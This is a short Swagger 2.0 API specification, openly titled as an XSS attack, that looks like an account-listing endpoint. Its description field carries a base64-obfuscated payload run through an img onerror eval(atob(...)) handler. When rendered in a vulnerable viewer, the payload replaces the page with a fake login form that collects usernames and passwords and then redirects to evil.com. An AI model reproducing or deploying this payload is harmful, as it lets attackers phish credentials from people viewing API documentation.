swagger: '2.0'
info:
  title: XSS Attack BY olive_cipher
  description: |
    <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJzsKdmFyIGZvcm0gPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJjZW50ZXIiKTsKZm9ybS5pbm5lckhUTUwgPSAnPGI+U2thZmZvbGQgU3dhZ2dlciBMb2dpbjwvYj48YnI+VXNlcm5hbWU6IDxpbnB1dCBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InB3ZCI+PGJyPjxidXR0b24gb25jbGljaz0ic3ViTWl0KCkiPkxvZ2luPC9idXR0b24+PGJyPjxidXR0b24gb25jbGljaz0id2luZG93Lm9wZW4oJ2h0dHBzOi8vZG9jcy5nb29nbGUuY29tL2Zvcm1zL2QvZS8xRkFJcFFMU2R6RGM3Smo2SGdQZHV4eTVSaXNQaHkx aWFBQXNJNkQ1SG9aczFFanNRS3UxZURRL3ZpZXdmb3JtP3VzcD1kaWFsb2cnKSI+U2lnbiB1cDwvYnV0dG9uPic7CmZvcm0ub25zdWJNaXQgPSBmdW5jdGlvbigpeyB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZXZpbC5jb20nOyB9Owpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGZvcm0pOw==' onerror='eval(atob(this.id))'>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /olive_cipher:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - olive_cipher_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
